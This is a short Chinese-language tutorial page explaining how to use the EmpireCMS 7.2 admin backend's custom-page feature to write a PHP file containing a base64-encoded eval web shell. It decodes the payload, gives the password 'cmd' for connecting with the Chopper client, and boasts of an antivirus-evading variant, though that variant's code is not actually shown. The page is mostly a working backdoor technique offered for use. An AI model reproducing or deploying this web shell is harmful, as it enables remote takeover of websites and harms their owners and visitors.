萬盛學電腦網

 萬盛學電腦網 >> CMS教程 >> 帝國cms7.2後台的代碼漏洞免殺版

帝國cms7.2後台的代碼漏洞免殺版

class="area">

     都知道帝國cms的安全性能也是數一數二的,很多做SEO的站都選擇了帝國cms。我有一個朋友的站點就是用帝國cms的,發現之前有過7.2的一個漏洞,如果內容直接添一句話或者php大馬是無用的,因為他會生成xxx.php前先給你執行!

    自定義頁面-增加自定義頁面-隨便寫了xxx.php文件名,頁面內容填寫,<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script>

    PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST['cmd']);?> 的base64加密。 所以生成xxx.php後 會出現內容 <?php @eval($_POST['cmd']);?> 在文件裡,然後用菜刀直接連接吧!!

    如果說,服務器安裝了殺軟 默認的這種是直接被殺掉的。

    我寫了一個免殺的一句話 在護衛神已經測試過免殺 其他的其他大伙再進行測試吧。!

    digguocms

    密碼是cmd 

    不過說下 這個適合那種留後面的一句話使用 如果說 不知道後台賬號密碼的話也是白搭 提交烏雲網肯定會被官方忽略的 而且 就一個破免殺 提烏雲 丟人

copyright © 萬盛學電腦網 all rights reserved